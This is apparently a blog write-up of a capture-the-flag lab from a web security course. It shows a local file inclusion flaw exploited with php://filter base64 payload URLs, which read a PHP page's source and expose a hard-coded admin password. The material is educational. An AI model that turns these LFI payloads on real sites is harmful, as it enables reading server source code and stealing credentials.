Simple Web 0x08(Lab - My First Meow Website)

Posted on 2023-01-31 | Post modified | In Security Course｜NTUST WS｜LFI |

Simple Web 0x08(Lab - My First Meow Website)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:8400/
Target: Login as Admin

Background

Exploit

Observe: According to the URL, http://h4ck3r.quest:8400/?page=inc/home, it might have LFI problem.
Use php://filter to read page
- http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=inc/home
- source code ```php <!DOCTYPE html>
Meow

🐱

Home About Admin

```

Observe page source code: We know that admin.php is under / directory.

http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=admin :::spoiler admin source code ```php

Admin Panel

<?php $admin_account = array(“username” => “admin”, “password” => “kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ”); if ( isset($_GET[‘username’]) && isset($_GET[‘password’]) && $_GET[‘username’] === $admin_account[‘username’] && $_GET[‘password’] === $admin_account[‘password’] ) { echo “<h1>LOGIN SUCCESS!</h1><p>“.getenv(‘FLAG’).”</p>”; }

?> ```

Then we get admin password is: kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ. Then we got flag!!!

Post author: SBK6401
Post link: https://bernie6401.github.io/Simple-Web-0x08(Lab-My-First-Meow-Website)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Simple Web 0x08(Lab - My First Meow Website)

tags: NTUSTWS CTF Web

Background

Exploit

Admin Panel

tags: `NTUSTWS` `CTF` `Web`